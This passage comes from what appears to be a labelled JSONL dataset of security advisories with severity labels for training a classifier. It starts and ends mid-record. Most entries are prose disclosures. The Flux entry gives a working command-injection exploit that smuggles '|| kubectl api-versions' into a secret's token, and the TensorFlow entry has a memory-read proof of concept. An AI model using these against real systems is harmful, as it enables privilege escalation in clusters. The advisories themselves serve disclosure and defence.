if the functionality is needed for production, a different package is used instead.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-07-24", "split": "train"} -{"id": "658731ba0dc8b56d8585", "text": "libxml as used in Nokogiri has an infinite loop in a certain end-of-file situation\n\nxmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.\nThe Nokogiri RubyGem has patched its vendored copy of libxml2 in order to prevent this issue from affecting nokogiri.", "text_raw": "libxml as used in Nokogiri has an infinite loop in a certain end-of-file situation\n\n[Severity: HIGH]\n\nxmlStringLenDecodeEntities in parser.c in libxml2 2.9.10 has an infinite loop in a certain end-of-file situation.\nThe Nokogiri RubyGem has patched its vendored copy of libxml2 in order to prevent this issue from affecting nokogiri.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-02-24", "split": "train"} -{"id": "71a7e64e044c72161066", "text": "Improper Authentication in Apache Zeppelin\n\nIn Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.", "text_raw": "Improper Authentication in Apache Zeppelin\n\n[Severity: HIGH]\n\nIn Apache Zeppelin prior to 0.8.0 the cron scheduler was enabled by default and could allow users to run paragraphs as other users without authentication.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2019-04-24", "split": "train"} -{"id": "9109b18321c1dbe17f52", "text": "slimerjs-edge downloads Resources over HTTP\n\nAffected versions of `slimerjs-edge` insecurely download an executable over an unencrypted HTTP connection.\n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `slimerjs-edge`.\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available.\n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "text_raw": "slimerjs-edge downloads Resources over HTTP\n\n[Severity: HIGH]\n\nAffected versions of `slimerjs-edge` insecurely download an executable over an unencrypted HTTP connection. \n\nIn scenarios where an attacker has a privileged network position, it is possible to intercept the response and replace the executable with a malicious one, resulting in code execution on the system running `slimerjs-edge`.\n\n\n## Recommendation\n\nNo patch is currently available for this vulnerability.\n\nThe best mitigation is currently to avoid using this package, using a different package if available. \n\nAlternatively, the risk of exploitation can be reduced by ensuring that this package is not installed while connected to a public network. If the package is installed on a private network, the only people who can exploit this vulnerability are those who have compromised your network or those who have privileged access to your ISP, such as Nation State Actors or Rogue ISP Employees.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-08-15", "split": "train"} -{"id": "47213dc8e782c21d3364", "text": "Prototype Pollution in deep-extend\n\nVersions of `deep-extend` before 0.5.1 are vulnerable to prototype pollution.\n\n## Recommendation\n\nUpdate to version 0.5.1 or later.", "text_raw": "Prototype Pollution in deep-extend\n\n[Severity: CRITICAL]\n\nVersions of `deep-extend` before 0.5.1 are vulnerable to prototype pollution.\n\n\n## Recommendation\n\nUpdate to version 0.5.1 or later.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-10-09", "split": "train"} -{"id": "9049eadeb2b98600e9f4", "text": "Prototype pollution vulnerability in 'libnested'\n\nPrototype pollution vulnerability in 'libnested' versions 0.0.0 through 1.5.0 allows an attacker to cause a denial of service and may lead to remote code execution.", "text_raw": "Prototype pollution vulnerability in 'libnested'\n\n[Severity: CRITICAL]\n\nPrototype pollution vulnerability in 'libnested' versions 0.0.0 through 1.5.0 allows an attacker to cause a denial of service and may lead to remote code execution.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "8c49e2ba85ab7052d550", "text": "Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit", "text_raw": "Teradek VidiU Pro 3.0.3 CSRF Change Password Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2018-05-21", "split": "train"} -{"id": "662f848e0bea0c325690", "text": "Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability", "text_raw": "Ashampoo Burning Studio Elements 10.0.9 (.ashprj) Heap Overflow Vulnerability\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2011-10-04", "split": "train"} -{"id": "e3f22d75cf229fe66ab9", "text": "Nil dereference in NATS JWT causing DoS of nats-server\n\n(This advisory is canonically )\n\n## Problem Description\n\nThe NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust.\n\nA malicious Account could create and sign a User JWT with a state not created by the normal tooling, such that decoding by the NATS JWT library (written in Go) would attempt a nil dereference, aborting execution.\n\nThe NATS Server is known to be impacted by this.\n\n## Affected versions\n\n#### JWT library\n\n* all versions prior to 1.1.0\n\n#### NATS Server\n\n* Version 2 prior to 2.1.9\n\n## Impact\n\n#### JWT library\n\n* Programs would nil dereference and panic, aborting execution by default.\n\n#### NATS server\n\n* Denial of Service caused by process termination\n\n## Workaround\n\nIf your NATS servers do not trust any accounts which are managed by untrusted entities, then malformed User credentials are unlikely to be encountered.\n\n## Solution\n\nUpgrade the JWT dependency in any application using it.\n\nUpgrade the NATS server if using NATS Accounts.", "text_raw": "Nil dereference in NATS JWT causing DoS of nats-server\n\n[Severity: HIGH]\n\n(This advisory is canonically )\n\n## Problem Description\n\nThe NATS account system has an Operator trusted by the servers, which signs Accounts, and each Account can then create and sign Users within their account. The Operator should be able to safely issue Accounts to other entities which it does not fully trust.\n\nA malicious Account could create and sign a User JWT with a state not created by the normal tooling, such that decoding by the NATS JWT library (written in Go) would attempt a nil dereference, aborting execution.\n\nThe NATS Server is known to be impacted by this.\n\n\n## Affected versions\n\n#### JWT library\n\n * all versions prior to 1.1.0\n\n#### NATS Server\n\n * Version 2 prior to 2.1.9\n\n\n## Impact\n\n#### JWT library\n\n * Programs would nil dereference and panic, aborting execution by default.\n\n#### NATS server\n\n * Denial of Service caused by process termination\n\n\n## Workaround\n\nIf your NATS servers do not trust any accounts which are managed by untrusted entities, then malformed User credentials are unlikely to be encountered.\n\n\n## Solution\n\nUpgrade the JWT dependency in any application using it.\n\nUpgrade the NATS server if using NATS Accounts.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-21", "split": "train"} -{"id": "54bf336cc96e96105143", "text": "Malicious Package in load-from-cwd-or-npm\n\nVersion 3.0.2 of `load-from-cwd-or-npm` contains malicious code. The malware breaks functionality of the `purescript-installer` package by injecting targeted code.\n\n## Recommendation\n\nUpgrade to version 3.0.4 or later. There is no indication of further compromise.", "text_raw": "Malicious Package in load-from-cwd-or-npm\n\n[Severity: CRITICAL]\n\nVersion 3.0.2 of `load-from-cwd-or-npm` contains malicious code. The malware breaks functionality of the `purescript-installer` package by injecting targeted code.\n\n\n## Recommendation\n\nUpgrade to version 3.0.4 or later. There is no indication of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "313f4bf87a129d539383", "text": "Generated Code Contains Local Information Disclosure Vulnerability\n\n### Impact\n\n**This vulnerability impacts generated code.** If this code was generated as a one-off occasion, not as a part of an automated CI/CD process, this code will remain vulnerable until fixed manually!\n\nOn Unix-Like systems, the system temporary directory is shared between all local users. When files/directories are created, the default `umask` settings for the process are respected. As a result, by default, most processes/apis will create files/directories with the permissions `-rw-r--r--` and `drwxr-xr-x` respectively, unless an API that explicitly sets safe file permissions is used.\n\n#### Java Code\n\nThe method `File.createTempFile` from the JDK is vulnerable to this local information disclosure vulnerability.\n\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/kotlin-client/infrastructure/ApiClient.kt.mustache#L209\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/finch/api.mustache#L84\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/Java/libraries/okhttp-gson/ApiClient.mustache#L831-L834\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/Java/libraries/jersey2/ApiClient.mustache#L630-L633\n\n### Patches\n\nFix has been applied to the master branch with:\n\n* https://github.com/swagger-api/swagger-codegen/commit/35adbd552d5f99b3ff1e0e59da228becc85190f2\n\nincluded in release: 2.4.19\n\n### Workarounds\n\nUsers can remediate the vulnerability in non patched version by manually (or programmatically e.g. in CI) updating the generated source code to use `java.nio.files.Files` temporary file creation instead of `java.io.File`, e.g. by changing\n\n```java\n\nif (tempFolderPath == null)\n return File.createTempFile(prefix, suffix);\n else\n return File.createTempFile(prefix, suffix, new File(tempFolderPath));\n\n```\n\nto\n\n```java\n\nif (tempFolderPath == null)\n return Files.createTempFile(prefix, suffix).toFile();\n else\n return Files.createTempFile(Paths.get(tempFolderPath), prefix, suffix).toFile();\n\n```\n\nor generally changing:\n\n```java\n\nFile.createTempFile(prefix, suffix);\n\n```\n\nto\n\n```java\n\nFiles.createTempFile(prefix, suffix).toFile();\n\n```\n\n### References\n\n* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n* [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)\n* [CWE-732: Incorrect Permission Assignment for Critical Resource](https://cwe.mitre.org/data/definitions/732.html)\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Email us at [security@swagger.io](mailto:security@swagger.io)\n\n#### Original vulnerability report\n\n> I'm performing OSS security research under the GitHub Security Lab Bug Bounty program.\n> I've been using a custom CodeQL query to find local temporary directory vulnerabilities in OSS with three custom CodeQL queries.\n> \n> - https://github.com/github/codeql/pull/4388/files#diff-71d36c0f2bd0b08e32866f873f1c906cdc17277e0ad327c0c6cd2c882f30de4f\n> - https://github.com/github/codeql/pull/4388/files#diff-1893a18a8bf43c011d61a7889d0139b998a5a78701a30fe7722eddd4c506aaac\n> - https://github.com/github/codeql/pull/4473\n> \n> The code generated by the Swagger Generator contains a local information disclosure vulnerability. The system temporary directory, on unix-like systems is shared between multiple users. Information written to this directory, or directories created under this directory that do not correctly set the posix standard permissions can have these directories read/modified by other users.\n> \n> ---\n> \n> This code exists in the code generator, in the generated code.\n> \n> In this case, I believe this is only a local inf", "text_raw": "Generated Code Contains Local Information Disclosure Vulnerability\n\n[Severity: MEDIUM]\n\n### Impact\n\n**This vulnerability impacts generated code.** If this code was generated as a one-off occasion, not as a part of an automated CI/CD process, this code will remain vulnerable until fixed manually!\n\nOn Unix-Like systems, the system temporary directory is shared between all local users. When files/directories are created, the default `umask` settings for the process are respected. As a result, by default, most processes/apis will create files/directories with the permissions `-rw-r--r--` and `drwxr-xr-x` respectively, unless an API that explicitly sets safe file permissions is used.\n\n#### Java Code\n\nThe method `File.createTempFile` from the JDK is vulnerable to this local information disclosure vulnerability.\n\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/kotlin-client/infrastructure/ApiClient.kt.mustache#L209\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/finch/api.mustache#L84\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/Java/libraries/okhttp-gson/ApiClient.mustache#L831-L834\n- https://github.com/swagger-api/swagger-codegen/blob/068b1ebcb7b04a48ad38f1cadd24bb3810c9f1ab/modules/swagger-codegen/src/main/resources/Java/libraries/jersey2/ApiClient.mustache#L630-L633\n\n### Patches\n\nFix has been applied to the master branch with:\n\n* https://github.com/swagger-api/swagger-codegen/commit/35adbd552d5f99b3ff1e0e59da228becc85190f2\n\nincluded in release: 2.4.19\n\n\n### Workarounds\n\nUsers can remediate the vulnerability in non patched version by manually (or programmatically e.g. in CI) updating the generated source code to use `java.nio.files.Files` temporary file creation instead of `java.io.File`, e.g. by changing\n\n```java\n\n if (tempFolderPath == null)\n return File.createTempFile(prefix, suffix);\n else\n return File.createTempFile(prefix, suffix, new File(tempFolderPath));\n\n```\n\nto \n\n```java\n\n if (tempFolderPath == null)\n return Files.createTempFile(prefix, suffix).toFile();\n else\n return Files.createTempFile(Paths.get(tempFolderPath), prefix, suffix).toFile();\n\n```\n\nor generally changing:\n\n```java\n\nFile.createTempFile(prefix, suffix);\n\n```\n\nto \n\n```java\n\nFiles.createTempFile(prefix, suffix).toFile();\n\n```\n\n### References\n\n* [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n* [CWE-200: Exposure of Sensitive Information to an Unauthorized Actor](https://cwe.mitre.org/data/definitions/200.html)\n* [CWE-732: Incorrect Permission Assignment for Critical Resource](https://cwe.mitre.org/data/definitions/732.html)\n\n### For more information\nIf you have any questions or comments about this advisory:\n\n* Email us at [security@swagger.io](mailto:security@swagger.io)\n\n#### Original vulnerability report\n\n> I'm performing OSS security research under the GitHub Security Lab Bug Bounty program.\n> I've been using a custom CodeQL query to find local temporary directory vulnerabilities in OSS with three custom CodeQL queries.\n> \n> - https://github.com/github/codeql/pull/4388/files#diff-71d36c0f2bd0b08e32866f873f1c906cdc17277e0ad327c0c6cd2c882f30de4f\n> - https://github.com/github/codeql/pull/4388/files#diff-1893a18a8bf43c011d61a7889d0139b998a5a78701a30fe7722eddd4c506aaac\n> - https://github.com/github/codeql/pull/4473\n> \n> The code generated by the Swagger Generator contains a local information disclosure vulnerability. The system temporary directory, on unix-like systems is shared between multiple users. Information written to this directory, or directories created under this directory that do not correctly set the posix standard permissions can have these directories read/modified by other users.\n> \n> ---\n> \n> This code exists in the code generator, in the generated code.\n> \n> In this case, I b", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-11", "split": "train"} -{"id": "44221396a874f1235fe2", "text": "Arbitrary memory read in `ImmutableConst`\n\n### Impact\nThe `ImmutableConst` operation in TensorFlow can be tricked into reading arbitrary memory contents:\n\n```python\nimport tensorflow as tf\n\nwith open('/tmp/test','wb') as f:\n f.write(b'\\xe2'*128)\n data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test')\n\nprint(data)\n```\n\nThis is because the `tstring` TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.\n\n### Patches\nWe have patched the issue in GitHub commit [3712a2d3455e6ccb924daa5724a3652a86f6b585](https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585) and GitHub commit [1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b](https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b).\n\nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Arbitrary memory read in `ImmutableConst`\n\n[Severity: MEDIUM]\n\n### Impact\nThe `ImmutableConst` operation in TensorFlow can be tricked into reading arbitrary memory contents:\n\n```python\nimport tensorflow as tf\n \nwith open('/tmp/test','wb') as f:\n f.write(b'\\xe2'*128)\n data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test')\n \nprint(data)\n```\n \nThis is because the `tstring` TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.\n\n### Patches\nWe have patched the issue in GitHub commit [3712a2d3455e6ccb924daa5724a3652a86f6b585](https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585) and GitHub commit [1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b](https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b).\n \nThe fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-10", "split": "train"} -{"id": "1c18ef7a837aecd0315f", "text": "OpenMRS 2.3 (1.11.4) XML External Entity (XXE) Processing PoC Exploit", "text_raw": "OpenMRS 2.3 (1.11.4) XML External Entity (XXE) Processing PoC Exploit\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2015-12-07", "split": "train"} -{"id": "53c555697b0d1883f4f7", "text": "Cross-Site Scripting in md-data-table\n\nAll versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row`\n\n## Recommendation\n\nAs there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table`", "text_raw": "Cross-Site Scripting in md-data-table\n\n[Severity: HIGH]\n\nAll versions of `md-data-table` are vulnerable to cross-site scripting (XSS). This vulnerability is exploitable if an attacker has control over data that is rendered by `mdt-row`\n\n\n## Recommendation\n\nAs there is no fix for this vulnerability at this time we recommend either selecting another package to perform this functionality or properly sanitizing all user data prior to rendering with `md-data-table`", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "558c87b2446be89c503f", "text": "activesupport Cross-site Scripting vulnerability\n\nCross-site scripting (XSS) vulnerability in `activesupport/lib/active_support/core_ext/string/output_safety.rb` in Ruby on Rails before 2.3.16, 3.0.x before , 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might allow remote attackers to inject arbitrary web script or HTML via vectors involving a ' (quote) character.", "text_raw": "activesupport Cross-site Scripting vulnerability\n\n[Severity: MEDIUM]\n\nCross-site scripting (XSS) vulnerability in `activesupport/lib/active_support/core_ext/string/output_safety.rb` in Ruby on Rails before 2.3.16, 3.0.x before , 3.1.x before 3.1.8, and 3.2.x before 3.2.8 might allow remote attackers to inject arbitrary web script or HTML via vectors involving a ' (quote) character.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "765e41fa2c10e7853794", "text": "SIMalliance Toolbox Browser Command Injection Vulnerability\n\nAffected: SIMalliance Toolbox Browser\n\nSIMalliance Toolbox Browser contains an command injection vulnerability that could allow remote attackers to retrieve location and IMEI information or execute a range of other attacks by modifying the attack message.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "SIMalliance Toolbox Browser Command Injection Vulnerability\n\nAffected: SIMalliance Toolbox Browser\n\nSIMalliance Toolbox Browser contains an command injection vulnerability that could allow remote attackers to retrieve location and IMEI information or execute a range of other attacks by modifying the attack message.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "3046cc30a4a2ff1f36c7", "text": "Apache Tomcat Denial of Service vulnerability\n\nThe HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "text_raw": "Apache Tomcat Denial of Service vulnerability\n\n[Severity: HIGH]\n\nThe HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API's blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-15", "split": "train"} -{"id": "1519ef0594eb7f16f16c", "text": "Microsoft Windows NTFS Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows New Technology File System (NTFS) contains an unspecified vulnerability that allows attackers to escalate privileges via a specially crafted application.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-191, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Microsoft Windows NTFS Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows New Technology File System (NTFS) contains an unspecified vulnerability that allows attackers to escalate privileges via a specially crafted application.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-191, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "ae01864cd13e1cc74d22", "text": "lxml vulnerable to Cross-Site Scripting\n\nAn XSS vulnerability was discovered in the python `lxml` clean module versions before 4.6.3. When disabling `the safe_attrs_only` and `forms` arguments, the `Cleaner` class does not remove the `formaction` attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. This issue is patched in `lxml` 4.6.3.", "text_raw": "lxml vulnerable to Cross-Site Scripting \n\n[Severity: MEDIUM]\n\nAn XSS vulnerability was discovered in the python `lxml` clean module versions before 4.6.3. When disabling `the safe_attrs_only` and `forms` arguments, the `Cleaner` class does not remove the `formaction` attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. This issue is patched in `lxml` 4.6.3.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-03-22", "split": "train"} -{"id": "19adf731aebb9940b25e", "text": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.", "text_raw": "An issue in Atomix v3.1.5 allows unauthorized Atomix nodes to join a target cluster via providing configuration information.\n\n[Severity: HIGH]", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-17", "split": "train"} -{"id": "3933b23497f1876549a9", "text": "Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability", "text_raw": "Mango Automation 2.6.0 Remote XSS POST Injection Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2015-09-26", "split": "train"} -{"id": "765f68acc0fcdbdeaae7", "text": "NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability", "text_raw": "NethServer 7.3.1611 (Upload.json) CSRF Script Insertion Vulnerability\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2017-08-29", "split": "train"} -{"id": "25b77ed420af83fbeea5", "text": "mio invalidly assumes the memory layout of std::net::SocketAddr\n\nThe mio crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.", "text_raw": "mio invalidly assumes the memory layout of std::net::SocketAddr\n\n[Severity: MEDIUM]\n\nThe mio crate has assumed std::net::SocketAddrV4 and std::net::SocketAddrV6 have the same memory layout as the system C representation sockaddr. It has simply casted the pointers to convert the socket addresses to the system representation. The standard library does not say anything about the memory layout, and this will cause invalid memory access if the standard library changes the implementation. No warnings or errors will be emitted once the change happens.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "8d77ada4eb7853c80c77", "text": "Oracle WebLogic Server Remote Code Execution Vulnerability\n\nAffected: Oracle WebLogic Server\n\nOracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Oracle WebLogic Server Remote Code Execution Vulnerability\n\nAffected: Oracle WebLogic Server\n\nOracle WebLogic Server contains an unspecified vulnerability, which is assessed to allow for remote code execution, based on this vulnerability being related to CVE-2020-14750.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-11-03", "split": "train"} -{"id": "f7fa0d4c69118bf4ce09", "text": "Incorrect cast in anymap\n\nAn issue was discovered in the anymap crate through 0.12.1 for Rust. It violates soundness via conversion of a *u8 to a *u64.", "text_raw": "Incorrect cast in anymap\n\n[Severity: CRITICAL]\n\nAn issue was discovered in the anymap crate through 0.12.1 for Rust. It violates soundness via conversion of a *u8 to a *u64.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "4ea9fa77061233c7fbd0", "text": "Data races in appendix\n\nThe `appendix` crate implements a key-value mapping data structure called\n`Index` that is stored on disk. The crate allows for any type to inhabit\nthe generic `K` and `V` type parameters and implements Send and Sync for them\nunconditionally.\n\nUsing a type that is not marked as `Send` or `Sync` with `Index` can allow it\nto be used across multiple threads leading to data races. Additionally using\nreference types for the keys or values will lead to the segmentation faults\nin the crate's code.", "text_raw": "Data races in appendix\n\n[Severity: MEDIUM]\n\nThe `appendix` crate implements a key-value mapping data structure called\n`Index` that is stored on disk. The crate allows for any type to inhabit\nthe generic `K` and `V` type parameters and implements Send and Sync for them\nunconditionally.\n\nUsing a type that is not marked as `Send` or `Sync` with `Index` can allow it\nto be used across multiple threads leading to data races. Additionally using\nreference types for the keys or values will lead to the segmentation faults\nin the crate's code.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "baa601ff9bc9ffec1317", "text": "Exposure of Sensitive Information to an Unauthorized Actor and SQL Injection in Spring Data JPA\n\nThis affects Spring Data JPA in versions up to and including 2.1.5, 2.0.13 and 1.11.19. Derived queries using any of the predicates ?startingWith?, ?endingWith? or ?containing? could return more results than anticipated when a maliciously crafted query parameter value is supplied. Also, LIKE expressions in manually defined queries could return unexpected results if the parameter values bound did not have escaped reserved characters properly.", "text_raw": "Exposure of Sensitive Information to an Unauthorized Actor and SQL Injection in Spring Data JPA\n\n[Severity: MEDIUM]\n\nThis affects Spring Data JPA in versions up to and including 2.1.5, 2.0.13 and 1.11.19. Derived queries using any of the predicates ?startingWith?, ?endingWith? or ?containing? could return more results than anticipated when a maliciously crafted query parameter value is supplied. Also, LIKE expressions in manually defined queries could return unexpected results if the parameter values bound did not have escaped reserved characters properly.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-05-14", "split": "train"} -{"id": "e8244ceb739c0a4bbee1", "text": "Privilege escalation to cluster admin on multi-tenant environments\n\nUsers that can create Kubernetes Secrets, Service Accounts and Flux Kustomization objects, could execute commands inside the kustomize-controller container by embedding a shell script in a Kubernetes Secret. This can be used to run `kubectl` commands under the Service Account of kustomize-controller, thus allowing an authenticated Kubernetes user to gain cluster admin privileges.\n\n### Impact\n\nMultitenant environments where non-admin users have permissions to create Flux Kustomization objects are affected by this issue.\n\n### Exploit\n\nTo exploit the command injection, first we create a secret with a shell command:\n\n```sh\nkubectl create secret generic exploit-token --from-literal=token=\" || kubectl api-versions\"\n```\n\nThen we create a Service Account that refers to the above Secret:\n\n```yaml\napiVersion: v1\nkind: ServiceAccount\nmetadata:\n name: exploit\n namespace: default\nautomountServiceAccountToken: false\nsecrets:\n- name: exploit-token\n```\n\nAnd finally a Kustomization that runs under the above Service Account:\n\n```yaml\napiVersion: kustomize.toolkit.fluxcd.io/v1beta1\nkind: Kustomization\nmetadata:\n name: exploit\n namespace: default\nspec:\n interval: 5m\n path: \"./deploy/\"\n sourceRef:\n kind: GitRepository\n name: app\n serviceAccountName: exploit\n```\n\nWhen kustomize-controller reconciles the above Kustomization, it will execute the shell command from the secret.\n\n### Patches\n\nThis vulnerability was fixed in kustomize-controller v0.15.0 (included in flux2 v0.18.0) released on 2021-10-08. Starting with v0.15, the kustomize-controller no longer executes shell commands on the container OS and the `kubectl` binary has been removed from the container image.\n\n### Workarounds\n\nTo prevent the creation of Kubernetes Service Accounts with `secrets` in namespaces owned by tenants, a Kubernetes validation webhook such as Gatekeeper OPA or Kyverno can be used.\n\n```yaml\napiVersion: kyverno.io/v1\nkind: ClusterPolicy\nmetadata:\n name: restrict-sa\nspec:\n validationFailureAction: enforce\n background: false\n rules:\n - name: validate-sa\n match:\n resources:\n kinds:\n - ServiceAccount\n namespaces:\n - tenant1\n - tenant2\n subjects:\n - kind: User\n name: some@tenant1.com\n - kind: User\n name: some@tenant2.com\n - kind: ServiceAccount\n name: kustomize-controller\n namespace: flux-system\n - kind: ServiceAccount\n name: helm-controller\n namespace: flux-system\n validate:\n message: \"Invalid service account\"\n pattern:\n X(secrets): \"*?\"\n```\n\n### References\n\nDisclosed by ADA Logics in a security audit of the Flux project sponsored by CNCF and facilitated by 